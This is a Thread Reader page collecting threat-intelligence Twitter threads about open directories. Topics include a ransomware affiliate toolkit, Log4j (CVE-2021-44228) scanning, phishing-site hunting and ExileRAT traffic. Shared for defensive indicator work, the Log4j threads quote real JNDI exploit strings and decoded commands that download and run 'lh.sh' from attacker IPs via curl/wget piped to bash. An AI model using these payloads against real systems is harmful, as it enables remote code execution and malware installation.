Discover and read the best of Twitter Threads about #OpenDir

Most recents (4)

1/ Interesting toolkit currently used by #Ransomware affiliates 💣

- 1.bat > Disabler (UAC/NLA/IFEOs)
- 1.msi > Anydesk wrapped using exemsi[.]com (persistence/C2)
- aswArPot.sys > Avast Anti-Rootkit driver used to disable AV/EDR (BYOVD)
- terminat.exe > #BURNTCIGAR (?) ImageImageImageImage
2/ The artifacts were available until today on a server with #opendir (80.209.241.3:8888) that was active for at least 15 days.

You may want to block/monitor this hash: 4b5229b3250c8c08b98cb710d6c056144271de099a57ae09f5d2097fc41bd4f1 (aswArPot.sys)

[+] bazaar.abuse.ch/browse/tag/80-… Image
3/ More references regarding these TTPs:

[+] @TrendMicro (2022-05-02): trendmicro.com/en_us/research…
[+] @Aon_plc (2022-02-26): aon.com/cyber-solution…
[+] @Mandiant (2022-02-23): mandiant.com/resources/unc2…

#AvosLocker/#CUBA/#UNC2596/#Ransomware
Read 5 tweets
Mass scanning activity detected from multiple hosts checking for servers using Apache Log4j (Java logging library) vulnerable to remote code execution (github.com/advisories/GHS…).

Query our API for "tags=CVE-2021-44228" for source IP addresses and other IOCs. #threatintel
Example CVE-2021-44228 payload:
${jndi:ldap://80.71.158.12:5557/Basic/Command/Base64/KGN1cmwgLXMgODAuNzEuMTU4LjEyL2xoLnNofHx3Z2V0IC1xIC1PLSA4MC43MS4xNTguMTIvbGguc2gpfGJhc2g=}

Decoded:
(curl -s 80.71.158.12/lh.sh||wget -q -O- 80.71.158.12/lh.sh)|bash

Source IP:
62.76.41.46 (🇷🇺) ImageImage
Example CVE-2021-44228 payload (decoded):
wget http://62.210.130.250/lh.sh;chmod +x lh[.]sh;./lh.sh
http://62.210.130.250/lh.sh

Type:
DDoS malware (virustotal.com/gui/file/2b794…)

Source IP:
45.137.21.9 (🇧🇩/🇳🇱) ImageImage
Read 41 tweets
:: Phishing Hunting Thread ::

This is a thread about how to hunt and find #Phishing sites.
Retweets would be great to help spread the knowledge and please add your own techniques, ideas and suggestions.

Let's go hunting!
Firstly we need a site to use as a pivot. I have attached a number of sources at the bottom of this thread. For demonstration purposes we will use this site ::

hxxp://www.new.froid-guyader.fr/libraries/sharepointcontract/

This is a #Phishing site against Microsoft Office
Initially let's see if there is a #PhishingKit or #OpenDir on the domain. Enumeration on the domain is important. This is a example of sites to load and see ::

- hxxp://www.new.froid-guyader.fr/libraries/
- hxxp://www.new.froid-guyader.fr/
- hxxp://www.froid-guyader.fr/
Read 16 tweets
Mal devs themselves introduce some of the funniest & hi-fi (although short lived) detection opportunities. Amongst several applicable HTTP methodologies, we see "Content-Type:application/octect-stream." Don't manually type out your HPTP headers for your C2 protocolols. #dailypcap
This network traffic comes from newish backdoor ExileRAT (compiled 2019-01-30T07:05:47Z) 606e943b93a2a450c971291e394745a6 that was hanging (with a multitude of other evil) on recently #opendir "http://27.126.188[.]212" There are ties to a humongous cluster of probs CN espionage.
The attackers from IP 27.126.188[.]212 are rollin' deep with kit. get_robin.py (1) looks to be some derivative of github.com/bhdresh python toolkit and also does some logging of connections. Sc.dat (2) is HTML that does JS get and creates a scheduled task for the exe.
Read 5 tweets

Related hashtags

Did Thread Reader help you today?

Support us! We are indie developers!


This site is made by just two indie developers on a laptop doing marketing, support and development! Read more about the story.

Become a Premium Member ($3.00/month or $30.00/year) and get exclusive features!

Become Premium

Too expensive? Make a small donation by buying us coffee ($5) or help with server cost ($10)

Donate via Paypal Become our Patreon

Thank you for your support!